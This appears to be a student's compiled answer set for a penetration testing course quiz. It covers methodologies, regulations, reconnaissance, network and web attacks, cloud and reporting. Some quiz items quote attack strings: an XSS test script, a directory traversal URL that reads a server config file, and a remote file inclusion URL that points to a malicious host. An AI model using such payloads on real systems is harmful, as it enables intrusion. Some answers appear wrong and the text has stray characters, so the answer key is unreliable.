Yes, I accept my responsibility as specified in the Ethical Hacking Statement.

Which three internet job boards allow filtering job postings by seniority or experience level?
(Choose all that apply.)
● glassdoor.com
● indeed.com
● linkedin.com jobs
Protego has been contracted to do a network infrastructure test as part of a broader
penetration testing engagement. What will you be targeting in this test? (Choose all
that apply.)
● switches
● IPS devices
● AAA servers
Under what tactic in the MITRE ATT&CK matrix would you find the information
gathering stage of the Operation Dream Job procedure?
● Reconnaissance.

You need to setup a penetration testing practice lab because some of the tools that
are preferred at Protego are new to you. What best practices will you follow as you
setup your lab? (Choose all that apply.)

● Ensure closed access to the network and internet.

● Create a virtualized computing environment.
● Provide sufficient hardware resources to ensure valid results

You have just downloaded and installed VirtualBox or UTM. You start the
application, but you do not see the Kali VM running. What step did you forget?
- You must download and import or run the Kali VM file in VirtualBox or UTM

You have just started Kali and open a terminal from the panel. What will the
response be when you enter the pwd command at the prompt?
-home/kali

1.4.3 Quiz - Introduction to Ethical Hacking and Penetration Testing

Question 1

Which statement best describes the term ethical hacker?

a person who uses different tools than nonethical hackers to find vulnerabilities
and exploit targets
a person that is financially motivated to find vulnerabilities and exploit targets
a person that is looking to make a point or to promote what they believe
a person who mimics an attacker to evaluate the security posture of a network

Question 2
Which threat actor term describes a well-funded and motivated group that will use
the latest attack techniques for financial gain?

hacktivist
state-sponsored attacker
organized crime
insider threat
Question 3

Which type of threat actor uses cybercrime to steal sensitive data and reveal it
publicly to embarrass a target?

qorganized crime
hacktivist
insider threat
state-sponsored attacker
Question 4

What is a state-sponsored attack?

An attack perpetrated by a well-funded and motivated group that will typically use
the latest attack techniques for financial gain.
An attack perpetrated by governments worldwide to disrupt or steal information
from other nations.
An attack perpetrated by disgruntled employees inside an organization.
An attack is perpetrated to steal sensitive data and then reveal it to the public to
embarrass or financially affect a target.
Question 5

What is an insider threat attack?

An attack perpetrated by a well-funded and motivated group that will typically use
the latest attack techniques for financial gain.
An attack perpetrated by governments worldwide to disrupt or steal information
from other nations.
An attack perpetrated by disgruntled employees inside an organization.
An attack is perpetrated to steal sensitive data and then reveal it to the public to
embarrass or financially affect a target.
Question 6

What kind of security weakness is evaluated by application-based penetration tests?

firewall security
logic flaws
wireless deployment
data integrity between a client and a cloud provider
Question 7
What two resources are evaluated by a network infrastructure penetration test?
(Choose two.)

AAA servers
CSPs
web servers
IPSs
back-end databases
Question 8

When conducting an application-based penetration test on a web application, the

assessment should also include testing access to which resources?

AAA servers
cloud services
switches, routers, and firewalls
back-end databases
Question 9

What is the purpose of bug bounty programs used by companies?

reward security professionals for finding vulnerabilities in the systems of the

company
reward security professionals for discovering malicious activities by attackers in
the systems of the company
reward security professionals for fixing vulnerabilities in the systems of the
company
reward security professionals for breaking into a corporate facility to expose
weaknesses in the physical perimeter
Question 10

What characterizes a partially known environment penetration test?

The tester must test the electrical grid supporting the infrastructure of the target.
The tester is provided with a list of domain names and IP addresses in the scope
of a particular target.
The test is a hybrid approach between unknown and known environment tests.
The tester should not have prior knowledge of the organization and infrastructure
of the target.
Question 11

What characterizes a known environment penetration test?

The test is somewhat of a hybrid approach between unknown and known

environment tests.
The tester could be provided with network diagrams, IP addresses, configurations,
and user credentials.
 The tester should not have prior knowledge of the organization and infrastructure
of the target.
The tester may be provided only the domain names and IP addresses in the scope
of a particular target.
Question 12

Which type of penetration test would only provide the tester with limited information
such as the domain names and IP addresses in the scope?

known-environment test
partially known environment test
unknown-environment test
OWASP Web Security Testing Guide
Question 13

Match the penetration testing methodology to the description.

Categories:
PTES: provides information about types of attacks and methods
MITRE ATT&CK: collection of different matrices of tactics and techniques that
adversaries use while preparing for an attack
OWASP WSTG: covers the high-level phases of web application security testing
NIST SP 800-115: provides organizations with guidelines on planning and
conducting information security testing
OSSTMM: lays out repeatable and consistent security testing

Question 14

Which three options are phases in the Penetration Testing Execution Standard
(PTES)? (Choose three.)

Threat modeling
Penetration
Reporting
Enumerating further
Network mapping
Exploitation
Question 15

Which two options are phases in the Information Systems Security Assessment
Framework (ISSAF)? (Choose two.)

Pre-engagement interactions
Maintaining access
Reporting
 Post-exploitation
Vulnerability identification
Question 16

Which two options are phases in the Open Source Security Testing Methodology
Manual (OSSTMM)? (Choose two.)

Vulnerability Analysis
Maintaining Access
Work Flow
Network Mapping
Trust Analysis
Question 17

Which penetration testing methodology is a comprehensive guide focused on web

application testing?

MITRE ATT&CK
OWASP WSTG
NIST SP 800-115
OSSTMM
Question 18

Which option is a Linux distribution that includes penetration testing tools and
resources?

OWASP
PTES
SET
BlackArch
Question 19

Which option is a Linux distribution URL that provides a convenient learning

environment about pen testing tools and methodologies?

vmware.com
attack.mitre.org
parrotsec.org
virtualbox.org
Question 20

What does the "Health Monitoring" ko

requirement mean when setting up a penetration test lab environment?

The tester needs to be sure that a lack of resources is not the cause of false
results.
The tester needs to be able to determine the causes when something crashes.
 The tester needs to ensure controlled access to and from the lab environment and
restricted access to the internet.
The tester validates a finding running the same test with a different tool to see if
the results are the same.
Question 21

Which tool would be useful when performing a network infrastructure penetration

test?

vulnerability scanning tool

bypassing firewalls and IPSs tool
interception proxies tool
mobile application testing tool
Question 22

Which tool should be used to perform an application-based penetration test?

sniffing traffic tool

bypassing firewalls and IPSs tool
interception proxies tool
cracking wireless encryption tool
Question 23

Which tools should be used to perform a wireless infrastructure penetration test?

web vulnerability detection tools

traffic manipulation tools
proxy interception tools
de-authorizing network devices tools
Question 24

Which tools should be used for testing the server and client platforms in an
environment?

cracking wireless encryption tools

vulnerability scanning tools
interception proxies tools
de-authorizing network devices tools
Question 25

Sometimes a tester cannot virtualize a system to do the proper penetration testing.

What action should be taken if a system cannot be tested in a virtualized
environment?

a full backup of the system

rebuild the system after any test is performed
adopt penetration test tools that will certainly not damage the system
 a complete report with recommended repairs

2.1.4 Practice - Regulations

Place the options in the following order:

General Data Protection strengthens and unifies data protection for

Regulation (GDPR) individuals within the European Union

NIST SP 800-57 guidelines for encryption key management

Payment Card Industry Data secures the processing of credit card and
Security Standard (PCI DSS) other types of digital payments

Gramm-Leach-Bliley Act (GLBA) applies to all financial services organizations,

regardless of size

Health Insurance Portability and safeguards electronic health information

Accountability Act (HIPAA)
2.1.8 Practice - Legal Concepts

Place the options in the following order:

Service-level documented minimum and maximum performance expectations

agreement of the penetration test service
(SLA)

Confidentiality agreement regarding how to communicate and handle sensitive

data, such as account credentials that were uncovered by the
testing

Disclaimer statements such as "The penetration test report cannot and

does not protect against personal or business loss resulting
from the test agreement."

Non-disclosure specifies and defines confidential material, knowledge, and

agreement information that should be kept confidential and not be disclosed
(NDA) to outside parties
Question 1

Answer: HIPAA

Question 2

Answer: FedRAMP

Question 3

Answer: GDPR

Question 4

Answer: Federal Trade Commission (FTC)

Question 5

Answer: healthcare clearinghouse

Question 6

Answer: health plan

Question 7

xAnswer: primary account number

Question 8

Answers:

● CAV2/CVC2/CVV2/CID
● full magnetic strip data or equivalent data on a chip
Question 9

● Part 1: General — provides general guidance and best practices for the
management of cryptographic keying material.
● xPart 2: Best Practices for Key Management Organization — provides
guidance on policy and security planning requirements for U.S.
government agencies.
● xPart 3: Application Specific Key Management Guidance — provides
guidance when using the cryptographic features of current systems.

Question 10

Answer: documentation of permission for performing the tests from the client
institutions

Question 11

Answer: service-level agreement (SLA)

Question 12

Answer: statement of work (SOW)

Question 13

Answer: unilateral NDA

Question 14

Answer: contract

Question 15

Answer: disclaimers

Question 16

Answers:

● testing timeline
● location of testing
● preferred method of communication

Question 17

Answer: types of allowed or disallowed tests

Question 18

Answer: Web Services Description Language (WSDL) document

Question 19

Answer: GraphQL documentation

Question 20

Answer: system and network architectural diagram

Question 21

Answer: ineffective identification of what technical and nontechnical elements

will be required for the penetration test

Question 22

Answer: Question the company contact person and review contracts.

Question 23

Answers:

● PGP
● S/MIME

Question 24

Answer: This type of testing is where the consultant will be provided with very
limited information about the targeted systems and network.

Question 25

Answer: the amount of information provided to the consultant

2.3.2 Practice - Demonstrate an Ethical Hacking Mindset

background checks of Check the credentials and skills of the

penetration testing teams individuals performing the penetration test.

adherence to the specific scope Create a list of applications, systems, or

of engagement networks to be tested.

Limiting invasiveness based on Specify tools and attacks that could be

scope detrimental and disruptive for your client’s
systems.

Limiting the use of tools used in Specifying the allowed, or disallowed, testing
 a particular penetration test tools.

Identification and immediate Report evidence of any system or network that

reporting of criminal activity was previously compromised.

j
3.5

Question 1

Which two tools could be used to gather DNS information passively? (Choose
two.)

● Recon-ng
● Dig

Question 2

When performing passive reconnaissance, which Linux command can be used

to identify the technical and administrative contacts of a given domain?
 ● whois

Question 3

Which specification defines the format used by image and sound files to
capture metadata?

● Exchangeable Image File Format (Exif)

Question 4

Why would a penetration tester perform a passive reconnaissance scan

instead of an active one?

● to collect information about a network without being detected

Question 5

What type of server is a penetration tester enumerating when they enter the
nmap -sU command?

● DNS, SNMP, or DHCP server

Question 6

What is the disadvantage of conducting an unauthenticated scan of a target

when performing a penetration test?

● Vulnerability of services running inside the target may not be detected.

Question 7

What is required for a penetration tester to conduct a comprehensive

authenticated scan against a Linux host?

● user credentials with root-level access to the target system

Question 8

In which circumstance would a penetration tester perform an unauthenticated

scan of a target?

● when user credentials were not provided

Question 9

Why would a penetration tester use the nmap -sF command?

● when a TCP SYN scan is detected by a network filter or firewall

Question 10
What is the purpose of host enumeration when beginning a penetration test?

● to identify all active IP addresses within the scope of the test

Question 11

What can be deduced when a tester enters the nmap -sF command to perform
a TCP FIN scan and the target host port does not respond?

● that the port is open

Question 12

What is the disadvantage of running a TCP Connect scan compared to running

a TCP SYN scan during a penetration test?

● The extra packets required may trigger an IDS alarm.

Question 13

When a penetration test identifies a vulnerability, how should the vulnerability

be further verified?

● determine if the vulnerability is exploitable

Question 14

Why is the Common Vulnerabilities and Exposures (CVE) resource useful

when investigating vulnerabilities detected by a penetration test?

● It is an international consolidation of cybersecurity tools and databases.

Question 15

What is the purpose of applying the Common Vulnerability Scoring System

(CVSS) to a vulnerability detected by a penetration test?

● to calculate the severity of the vulnerability

Question 16

A threat actor is looking at the IT and technical job postings of a target

organization. What would be the most beneficial information to capture from
these postings?

● the type of hardware and software used

Question 17

How is open-source intelligence (OSINT) gathering typically implemented

during a penetration test?
 ● by using public internet searches

Question 18

What initial information can be obtained when performing user enumeration in

a penetration test?

● a valid list of users

Question 19

What useful information can be obtained by running a network share

enumeration scan during a penetration test?

● systems on a network that are sharing files, folders, and printers

Question 20

A penetration tester must run a vulnerability scan against a target. What is the
benefit of running an authenticated scan instead of an unauthenticated scan?

● Authenticated scans can provide a more detailed picture of the target

attack surface.

Question 21

What are three considerations when planning a vulnerability scan on a target

production network during a penetration test? (Choose three.)

● the timing of the scan

● the available network bandwidth
● the network topology

Question 22

When performing a vulnerability scan of a target, how can adverse impacts on

traversed devices be minimized?

● The scan should be performed as close to the target as possible.

Question 23

A company hires a cybersecurity consultant to conduct a penetration test to

assess vulnerabilities in network systems. The consultant is preparing the
final report to send to the company. What is an important feature of a final
penetration test report?

● It gives an accurate presentation of vulnerabilities.

Question 24
What is the advantage of using the target Wi-Fi network for reconnaissance
packet inspection?

● Physical access to the building may not be required.

Question 25

What guidance does the NIST Cybersecurity Framework provide to help

improve an organization's cybersecurity posture?

● The framework outlines standards and industry best practices.

●
5.3

Question 1

Which NetBIOS service is used for connection-oriented communication?

● Answer: NetBIOS-SSN

Question 2

Match the port type and number with the respective NetBIOS protocol service.

● UDP port 138 - NetBIOS Datagram Service (A)

● UDP port 137 - NetBIOS Name Service (B)
● TCP port 445 - SMB protocol (C)
● TCP port 139 - NetBIOS Session Service (D)
● TCP port 135 - Microsoft Remote Procedure Call (MS-RPC) (E)

Question 3

What two features are present on DNS servers using BIND 9.5.0 and higher
that help mitigate DNS cache poisoning attacks? (Choose two.)

● Answer:
○ randomization of ports
○ provision of cryptographically secure DNS transaction identifiers

Question 4
What UDP port number is used by SNMP protocol?

● Answer: 161

Question 5

Which is a characteristic of a DNS poisoning attack?

● Answer: The DNS resolver cache is manipulated.

Question 6

Which Kali Linux tool or script can gather information on devices configured
for SNMP?

● Answer: snmp-check

Question 7

Match the SMTP command with the respective description.

● MAIL - used to denote the email address of the sender (A)

● RSET - used to cancel an email transaction (B)
● EHELO - used to initiate a conversation with an Extended Simple Mail
Transport Protocol server (C)
● DATA - used to initiate the transfer of the contents of an email message
(D)
● STARTTLS - used to start a Transport Layer Security connection to an
email server (E)
● HELO - used to initiate an SMTP conversation with an email server (F)

Question 8

Which two best practices would help mitigate FTP server abuse and attacks?
(Choose two.)

● Answer:
○ limit anonymous logins to a select group of people
○ require re-authentication of inactive sessions

Question 9

Which is a characteristic of the pass-the-hash attack?

● Answer: capture of a password hash (as opposed to the password

characters) and using the same hashed value for authentication and
lateral access to other networked systems

Question 10

What is a Kerberoasting attack?

 ● Answer: It is a post-exploitation attempt that is used to extract service
account credential hashes from Active Directory for offline cracking.

Question 11

Match the attack type with the respective description.

● Reflected DOS (A) - This attack uses spoofed packets that appear to be
from the victim. Then the sources become unwitting participants in the
attack by sending the response traffic back to the intended victim.
● DNS Amplification (B) - This an attack in which the attacker exploits
vulnerabilities in target servers to initially turn small queries into much
larger payloads, which are used to bring down the servers of the victim.
● Direct DOS (C) - This occurs when the source of the attack generates the
packets, regardless of protocol, application, and so on, that are sent
directly to the victim of the attack.
● DDOS (D) - This attack uses botnets that can be manipulated from a
command and control (CnC, or C2) system.

Question 12

Match the attack type with the respective description.

● Route Manipulation attacks (A) - typically a BGP hijacking attack by

configuring or compromising an edge router to announce prefixes that
have not been assigned to the organization
● Downgrade attacks (B) - the attacker forces a system to favor a weak
encryption protocol or hashing algorithm that may be susceptible to
other vulnerabilities
● DHCP Starvation attack (C) - an attacker floods a server with bogus
DISCOVER packets until the server exhausts the supply of IP addresses
● VLAN Hopping attack (D) - an attacker bypass any layer 2 restrictions
built to divide hosts
● MAC address spoofing attack (E) - an attacker spoofs the physical
address of the NIC device to match the address of another on a network
in order to gain unauthorized access or launch a Man-in-the-Middle
attack

Question 13

Which tool can be used to perform a Disassociation attack?

● Answer: Airmon-ng

Question 14

Which is a characteristic of a Bluesnarfing attack?

● Answer: An attack that can be performed using Bluetooth with

vulnerable devices in range. This attack actually steals information from
the device of the victim.
Question 15

Which Wi-Fi protocol is most vulnerable to a brute-force attack during a Wi-Fi

network deployment?

● Answer: WPS

Question 16

What does the MFP feature in the 802.11w standard do to protect against
wireless attacks?

● Answer: It helps defend against deauthentication attacks.

Question 17

What is a DNS resolver cache on a Windows system?

● Answer: It is a temporary database that contains records of all the

recent visits and attempted visits to websites and other internet
domains.

Question 18

Match the TCP port number with the respective email protocol that uses it.

● 465 (A) - The port registered by the Internet Assigned Numbers

Authority (IANA) for SMTP over SSL (SMTPS).
● 587 (B) - The Secure SMTP (SSMTP) protocol for encrypted
communications, as defined in RFC 2487, using STARTTLS.
● 143 (C) - The default port used by the IMAP protocol in non-encrypted
communications.
● 995 (D) - The default port used by the POP3 protocol in encrypted
communications.
● 993 (E) - The default port used by the IMAP protocol in encrypted
(SSL/TLS) communications.

Question 19

Which is the default TCP port used in SMTP for non-encrypted

communications?

● Answer: 25

Question 20

What is a characteristic of a Kerberos silver ticket attack?

● Answer: It uses forged service tickets for a given service on a particular

server.
Question 21

Which attack is a post-exploitation activity that an attacker uses to extract

service account credential hashes from Active Directory for offline cracking?

● Answer: Kerberoasting

Question 22

Which four items are needed by an attacker to create a silver ticket for a
Kerberos silver ticket attack? (Choose four.)

● Answer:
○ hash value
○ system account
○ FQDN
○ target service

Question 23

Which kind of attack is an IP spoofing attack?

● Answer: On-path

Question 24

What is a common mitigation practice for ARP cache poisoning attacks on

switches to prevent spoofing of Layer 2 addresses?

● Answer: DAI

Question 25

An attacker is launching a reflected DDoS attack in which the response traffic

is made up of packets that are much larger than those that the attacker initially
sent. Which type of attack is this?

● Answer: amplification
6.13

Question 1
Which two functions are provided by a web proxy device? (Choose two.)

● Caching of HTTP messages

 ● Enabling HTTP transfers across a firewall

Question 2
Match the HTTP status code contained in a web server response to the description.

● Codes in the 200 range: Related to successful transactions

● Codes in the 300 range: Related to HTTP redirections
● Codes in the 400 range: Related to client errors
● Codes in the 500 range: Related to server errors
● Codes in the 100 range: Informational

Question 3
Match the elements in the URL
ftp://xyz-company.com:2457/support/file;id=65?name=intro&r=true
to the description.

● xyz-company.com: Host
● 2457: Port
● support/file: Path
● ftp: Scheme
● name=intro&r=true: Query-string
● id=65: Path-segment-params

Question 4
Which function is provided by HTTP 2.0 to improve performance over HTTP 1.1?

● HTTP 2.0 provides HTTP message multiplexing and requires fewer messages
to download web content.

Question 5
Why should application developers change the session ID names used by common
web application development frameworks?

● These session ID names can be used to fingerprint the application framework

employed.

Question 6
Which mechanism is used by a shopping site to securely maintain user
authentication during shopping?

● Session ID

Question 7
What is the best mitigation approach against session fixation attacks?

● Ensure that the session ID is used after a user completes authentication.

Question 8
Which two attributes can be set in a web application cookie to indicate it is a
persistent cookie? (Choose two.)

● Expires
 ● Max-Age

Question 9
Which international organization is dedicated to educating industry professionals,
creating tools, and evangelizing best practices for securing web applications and
underlying systems?

● Open Web Application Security Project (OWASP)

Question 10
Which component in the statement below is most likely user input on a web form?
SELECT * FROM group WHERE attack = ‘network’ AND a-type LIKE
‘ping%’;

● Ping

Question 11
Which statement describes an example of an out-of-band SQL injection attack?

● An attacker launches the attack on a web site and forces the web application
to send the query results via an email.

Question 12
A threat actor launches an SQL injection attack by sending multiple specific
statements and reconstructing the key information. What type of attack is this?

● In-band

Question 13
Which technique exploits SQL injection vulnerability by making the application
perform multiple SELECT queries?

● Union operator

Question 14
Which type of SQL query is in the SQL statement select * from users where
user = "admin";?

● Static query

Question 15
Which type of penetration testing can be used to verify the configuration of Microsoft
Active Directory?

● LDAP injection

Question 16
What is a potentially dangerous web session management practice?

● Including the session ID in the URL

Question 17
What is the effect of the HTTPOnly flag in cookies?

● It forces the web browser to have the cookies processed only by the server.

Question 18
Which threat does a security policy that configures routers and switches with
advanced security measures mitigate?

● Default credential attack

Question 19
What type of vulnerability does the attacker try to exploit with the following request:
https://portal.a-univ.edu/?
search=students&results=50&search=staff?

● HTTP parameter pollution

Question 20
Where would a tester use the string <script>alert("XSS Test
Now")</script> to test for cross-site scripting vulnerabilities?

● In a user input field in a web form

Question 21
According to OWASP, which three rules help prevent XSS attacks? (Choose three.)

● Use HTML escape before inserting untrusted data into HTML element
content.
● Use attribute escape before inserting untrusted data into HTML common
attributes.
● Use JavaScript escape before inserting untrusted data into JavaScript data
values.

Question 22
Which type of web vulnerability is being exploited by the attacker using the following
URL: http://192.168.46.82:45/vulnerabilities/fi/?
page=../../../../../etc/httpd/httpd.conf?

● Directory traversal

Question 23
Which type of vulnerability did the attacker try to exploit using the following URL:
http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.o
rg/cookie.html?

● Remote file inclusion

Question 24
Which insecure code practice enables a catastrophic threat where an attacker
compromises the application or system?
 ● Use of hard-coded credentials

Question 25
What is the best practice to mitigate vulnerabilities from a lack of proper error
handling in an application?

● Use a well-thought-out scheme to provide meaningful error messages to the

users but no useful information to an attacker.
7.3

Question 1

Which term is an essential characteristic of cloud computing as defined in

NIST SP 800-145?
Answer: resource pooling

Question 2

Which cloud technology attack method involves breaching the infrastructure

to gather and steal information such as valid usernames, passwords, tokens,
and PINs?
Answer: credential harvesting

Question 3

Which cloud technology attack method could exploit a bug in a software

application to gain access to resources that normally would not be accessible
to a user?
Answer: privilege escalation

Question 4

Which term describes when a lower-privileged user accesses functions

reserved for higher-privileged users?
Answer: vertical privilege escalation

Question 5

Which cloud technology attack method could a threat actor use to access a
user or application account that allows access to more accounts and
information?
Answer: account takeover

Question 6

Which tool could be used to find vulnerabilities that could lead to metadata
service attacks?
Answer: Dagda

Question 7

Which cloud technology attack method could generate crafted packets to

cause a cloud application to crash?
Answer: resource exhaustion attack

Question 8

Which cloud technology attack method would require the threat actor to create
a malicious application and install it into a SaaS, PaaS, or IaaS environment?
Answer: cloud malware injection attack

Question 9

What is a common cause of data breaches in attacks against misconfigured

cloud assets?
Answer: using insecure permission configurations for cloud object storage services

Question 10
A threat actor has compromised a VM in a cloud environment that shares the
same physical hardware as non-compromised VMs. Which cloud technology
attack method could now be used to exfiltrate credentials, cryptographic keys,
and other sensitive information?
Answer: side-channel attack

Question 11

Which tool helps software developers and cloud consumers deploy

applications in the cloud and use the resources that the cloud provider offers?
Answer: Cloud development kits (CDKs)

Question 12

Which mobile device vulnerability is targeted when a threat actor reverse

engineers a mobile app to see how it creates and stores keys in the iOS
Keychain?
Answer: insecure storage

Question 13

Which tool is an open-source framework used to test the security of iOS

applications?
Answer: Needle

Question 14

Match the Bluetooth Low Energy (BLE) phase to the description.

● Phase 1: pairing feature exchange

● Phase 2: short-term key generation
● Phase 3: transport-specific key distribution

Question 15

Which option is a security vulnerability that affects IoT implementations?

Answer: plaintext communication and data leakage

Question 16

Which two IoT systems should never be exposed to the Internet? (Choose
two.)

● turbines in a power plant

● robots in a factory

Question 17

Which option is a collection of compute interface specifications designed to

offer management and monitoring capabilities independently of the CPU,
firmware, and operating system of the host?
Answer: Intelligent Platform Management Interface (IPMI)

Question 18

A threat actor uploaded a VM with malicious software to the VMware

Marketplace. When an organization deploys the VM, the threat actor can
manipulate the systems, applications, and user data. What type of VM
vulnerability has been enabled?
Answer: VM repository vulnerability

Question 19

Which tool is a set of open-source analysis tools that uses the ClamAV
antivirus engine to help detect vulnerabilities, Trojans, backdoors, and
malware in Docker images and containers?
Answer: Clair

Question 20

Which credential harvesting tool could be used to send a spear phishing email
with a link to a malicious site to a target victim?
Answer: Social-Engineer Toolkit (SET)

Question 21

Why do cloud architectures help minimize the impact of DoS or DDoS attacks
compared to hosting services on-premise?
Answer: cloud providers use a distributed architecture

Question 22

Which option is a characteristic of a VM hypervisor?

Answer: Type 1 hypervisors are also known as native or bare-metal hypervisors.

Question 23

A threat actor has compromised a VM in a data center and discovered a

vulnerability that provides access to data in another VM. What type of VM
vulnerability has been discovered?
Answer: VM escape vulnerability

Question 24

Which tool can be used to perform on-path attacks in BLE implementations?

Answer: GATTacker

Question 25
Which tool is an open-source container vulnerability scanner that can be used
to find vulnerabilities in a Docker image?
Answer: Anchore’s Grype
9.5

Question 1:
Which industry-standard method has created a catalog of known vulnerabilities that
provides a score indicating the severity of a vulnerability?

● CVSS

Question 2:
Which vulnerability catalog creates a list of publicly known vulnerabilities, each
assigned an ID number, description, and reference?

● CVE

Question 3:
Match the CVSS metric group with the respective information.

● A: Base metric group: includes exploitability metrics and impact metrics

● B: Environmental metric group: includes modified base metrics,
confidentiality, integrity, and availability requirements
● C: Temporal metric group: includes exploit code maturity, remediation level,
and report confidence

Question 4:
Which three items are included in the base metric group used by CVSS? (Choose
three.)

● Attack complexity
● Integrity impact
● User interaction

Question 5:
Which item is included in the environmental metric group used by CVSS?

● Confidentiality requirements

Question 6:
Which item is included in the temporal metric group used by CVSS?

● Exploit code maturity

Question 7:
Which tool can ingest the results from many penetration testing tools a cybersecurity
analyst uses and help this professional produce reports in formats such as CSV,
HTML, and PDF?

● Dradis

Question 8:
Match the description to the respective control category.

● Key rotation: Technical control

 ● Input sanitization: Technical control
● Secure software development life cycle: Administrative control
● Role-based access control: Administrative control
● Time-of-day restrictions: Operational control
● Job rotation: Administrative control
● Video surveillance: Physical control
● Biometric controls: Physical control

Question 9:
Which two items are examples of technical controls that can be recommended as
mitigations and remediation of the vulnerabilities found during a pen test? (Choose
two.)

● Multifactor authentication
● Certificate management

Question 10:
A recent pen-test results in a cybersecurity analyst report, including information on
process-level remediation, patch management, and secrets management solutions.
Which control category is represented by this example?

● Operational

Question 11:
Which document provides several cheat sheets and detailed guidance on preventing
vulnerabilities such as cross-site scripting, SQL injection, and command injection?

● OWASP

Question 12:
A cybersecurity analyst report should contain minimum password requirements and
policies and procedures. These are examples that are included in which control
category?

● Administrative

Question 13:
Which control category includes information on mandatory vacations and user
training in the cybersecurity analyst report?

● Administrative

Question 14:
When creating a cybersecurity analyst report, which control category includes
information concerning the access control vestibule?

● Physical

Question 15:
Match the term to the respective description.
 ● A: False positive: A security device triggers an alarm, but there is no
malicious activity or actual attack taking place
● B: True positive: A successful identification of a security attack or a malicious
event
● C: False negative: Malicious activities that are not detected by a network
security device
● D: True negative: An intrusion detection device identifies an activity as
acceptable behavior and the activity is acceptable

Question 16:
Which kind of event is also called a "benign trigger"?

● False positive

Question 17:
What kind of events diminishes the value and urgency of real alerts?

● False positives

Question 18:
Which kinds of events are malicious activities not detected by a network security
device?

● False negatives

Question 19:
Which kind of event occurs when an intrusion detection device identifies an activity
as acceptable behavior and the activity is acceptable?

● True negative

Question 20:
Which kind of event is a successful identification of a security attack?

● True positive

Question 21:
Which example of technical control is recommended to mitigate and prevent
vulnerabilities such as cross-site scripting, cross-site request forgery, SQL injection,
and command injection?

● User input sanitization

Question 22:
Which example of administrative controls enables administrators to control what
users can do at both broad and granular levels?

● RBAC

Question 23:
A document entitled "Building an Information Technology Security Awareness and
Training Program" succinctly defines why security education and training are so
important for users. The document defines ways to improve the security operations
of an organization. Which document is being described?

● NIST SP 800-50

Question 24:
How is the score that CVSS provides interpreted?

● Scores are rated from 0 to 10, with 10 being the most severe

Question 25:
What control category does system hardening belong to?

● Technical
10.3
Question 1

Which two items are programming logic constructs? (Choose two.)

● Conditionals
● Boolean operators

Question 2

Which two items are data structures used in programming languages?

(Choose two.)

● Arrays
● Lists

Question 3

Which two items can be included in a library? (Choose two.)

● Subroutines
● Message templates

Question 4

What is the definition of a procedure used in an application software?

● It is a section of code that is created to perform a specific task.

Question 5

Which programming language data structure is a special variable with more

than one value at a time?

● Array

Question 6

Which term describes a programming language component such as

JavaScript Object Notation (JSON)?

● Data structures

Question 7

What kind of data structure in Python is represented in the example below?

python
Copy code
cves = ['CVE-2022-0945', 'CVE-2023-1234', 'CVE-2022-0987']
 ● List

Question 8

Which programming language elements perform similar tasks?

● Procedures and functions

Question 9

What is the definition of a library in application software?

● It is a collection of resources that can be reused by programs.

Question 10

Which domain name database query utility has been restricted by the
European Union´s General Data Protection Regulation (GDPR) to protect
privacy?

● Whois

Question 11

What are two tools that can be used to perform active reconnaissance?
(Choose two.)

● Zenmap
● Maltego

Question 12

What are two tools that can be used to perform credential attacks? (Choose
two.)

● Mimikatz
● Patator

Question 13

Which Linux distribution comes with more than 1900 security penetration
testing tools?

● Kali Linux

Question 14

Which tool is designed to find metadata and hidden information in

documents?

● ExifTool
Question 15

Which programming language element is a block of code that can be reused

multiple times to execute a specific task?

● Function

Question 16

Which tool organizes query entities within the Entity Palette and calls the
search options "transforms"?

● Maltego

Question 17

Which programming language element is a code template that includes initial

variables and functions for creating an object?

● Class

Question 18

Which passive reconnaissance tool can be used to find information about

devices and networks on the Internet?

● Censys

Question 19

What is a command-line tool that allows for interactive or non-interactive

command execution?

● Bash

Question 20

Which popular Linux penetration testing distribution is based on Debian

GNU/Linux and has evolved from WHoppiX, WHAX, and BackTrack?

● Kali Linux

Question 21

Which vulnerability scanner tool offers a cloud-based service that performs

continuous monitoring, vulnerability management, and compliance checking?

● Qualys

Question 22
Which option is a PowerShell-based post-exploitation tool that can maintain
persistence on a compromised system and run PowerShell agents without the
need for powershell.exe?

● Empire

Question 23

Which tool can be used with Metasploit to maintain stealth and avoid detection
from security controls implemented by an organization?

● Veil

Question 24

Which encoding method can secretly exfiltrate confidential data in the payload
of DNS packets?

● Base64

Question 25

Which option is a Linux distribution tool for forensic evidence collection?

● CAINE